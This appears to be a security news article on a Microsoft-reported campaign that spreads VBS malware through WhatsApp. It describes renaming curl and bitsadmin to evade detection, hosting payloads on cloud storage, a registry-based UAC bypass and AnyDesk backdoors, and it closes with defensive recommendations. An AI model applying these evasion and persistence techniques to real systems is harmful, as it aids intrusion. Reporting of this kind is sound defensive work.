Microsoft Warns of WhatsApp-Delivered VBS Malware Campaign

Microsoft is warning of an ongoing malware campaign that uses WhatsApp messages to deliver malicious Visual Basic Script files to Windows users. The Microsoft Defender Experts team has tracked the activity since late February 2026, observing a sophisticated infection chain that combines social engineering with living-off-the-land techniques.

The Attack Chain

The campaign begins with WhatsApp messages containing malicious VBS file attachments. Microsoft hasn't disclosed the specific social engineering lures used to convince victims to execute these scripts, but the attack only works if users manually run the received files.

Once executed, the VBS script creates hidden folders in "C:\ProgramData" and drops renamed copies of legitimate Windows utilities. The attackers rename curl.exe to "netapi.dll" and bitsadmin.exe to "sc.exe"—names that blend with normal Windows system files and evade simple filename-based detection.

These renamed tools then download secondary payloads from cloud storage services including AWS S3, Tencent Cloud, and Backblaze B2. Using legitimate cloud platforms for payload hosting helps attackers evade network-based detection that blocks known malicious domains.

UAC Bypass and Persistence

The malware's most concerning capability is its User Account Control bypass technique. UAC is Windows' primary defense against unauthorized privilege escalation—it's the prompt that asks "Do you want to allow this app to make changes to your device?"

According to Microsoft's analysis, the malware "continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds." The technique involves registry manipulation targeting specific HKLM\Software\Microsoft\Win entries that control UAC behavior. Once successful, the malware can install unsigned MSI packages without user interaction.

This persistence mechanism ensures the infection survives system reboots. The attackers also deploy AnyDesk for remote access, giving them an interactive backdoor into compromised systems.

Living Off the Land

The campaign exemplifies the "living off the land" approach that's become standard in sophisticated malware operations. Rather than dropping custom malicious binaries that antivirus might flag, attackers use built-in Windows tools for their dirty work.

Curl handles file downloads. Bitsadmin manages background transfers. MSI packages install persistence components. Every tool is legitimate, signed by Microsoft, and present on virtually every Windows system. The malicious activity comes from how these tools are orchestrated, not from the tools themselves.

This approach mirrors techniques we've covered in the ClickFix campaigns that have spread Vidar and other infostealers. The ClickFix methodology tricks users into running PowerShell commands that chain legitimate tools together maliciously. WhatsApp VBS scripts represent a different delivery mechanism for similar post-exploitation techniques.

Cloud Infrastructure Abuse

The attackers' use of AWS S3, Tencent Cloud, and Backblaze B2 for payload hosting presents a detection challenge. Organizations can't simply block these services—they're used legitimately by thousands of applications. And the cloud providers can't easily distinguish malicious uploads from legitimate file storage.

This infrastructure abuse has accelerated across the threat landscape. Cloud services offer:

• High availability and fast delivery
• Trusted SSL certificates
• Resistance to takedown (legitimate services don't get blocklisted)
• Easy provisioning of new storage buckets when old ones are flagged

Security teams need to shift from domain-based blocking to behavior-based detection. The question isn't "is this traffic going to AWS?" but "why is curl downloading an MSI package from S3 at 3 AM?"

Why WhatsApp?

Messaging-based malware delivery has surged as email filtering has improved. Enterprise email gateways now catch most malicious attachments before they reach users. WhatsApp messages bypass that entire infrastructure.

Personal WhatsApp accounts on work devices—or WhatsApp Web on corporate systems—create attack paths that corporate security controls don't monitor. Users may be more trusting of messages from apparent contacts than they would be of email from unknown senders.

The Storm infostealer we covered recently also exploited messaging platforms for initial access, suggesting threat actors are systematically exploring alternatives to traditional email phishing.

Recommendations

Microsoft recommends the following defensive measures:

1. Disable VBS execution by default - Group Policy can prevent script host execution for users who don't need it
2. Monitor for renamed system utilities - Curl.exe shouldn't be named netapi.dll
3. Alert on UAC registry modifications - Legitimate software rarely touches these keys
4. Block script execution from user-writable locations - AppLocker or Windows Defender Application Control can help
5. Educate users about messaging-based threats - WhatsApp isn't safer than email for receiving files

For organizations that can't completely block VBS execution, behavioral detection becomes critical. The sequence of events—VBS execution, hidden folder creation, utility renaming, cloud downloads, UAC modification—should trigger alerts even if individual actions appear benign.